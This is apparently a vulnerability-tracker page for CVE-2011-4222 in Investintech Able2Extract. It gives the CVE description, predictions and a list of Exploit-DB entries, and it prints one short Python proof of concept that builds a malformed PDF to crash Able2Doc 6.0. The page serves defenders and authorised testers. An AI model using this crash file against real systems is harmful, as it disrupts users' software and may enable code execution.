CVE-2011-4222

critical
Published 2011-11-01 ยท Modified 2026-04-29
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Unspecified vulnerability in Investintech.com Able2Extract and Able2Extract Server allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted document.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-19391 dos windows verified
Carlos Mario Penagos Hollmann ยท 2012-06-25

Slimpdf Reader 1.0 - Memory Corruption

Source code queued for fetch โ€” refresh in a moment.
EDB-19393 dos windows verified text ยท 1 KB
Carlos Mario Penagos Hollmann ยท 2012-06-25

Able2Doc and Able2Doc Professional 6.0 - Memory Corruption

text exploit Source: Exploit-DB
# Exploit Title: Able2Doc and Able2Doc Professional v 6.0 memory corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4221


payload ="B"*13000
crash="startxref"
pdf=payload+crash

filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()
EDB-19392 dos windows verified
Carlos Mario Penagos Hollmann ยท 2012-06-25

Able2Extract and Able2Extract Server 6.0 - Memory Corruption

Source code queued for fetch โ€” refresh in a moment.

Application impact

VendorProductVersionsFixed
investintechable2extract
investintechable2extract_server

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.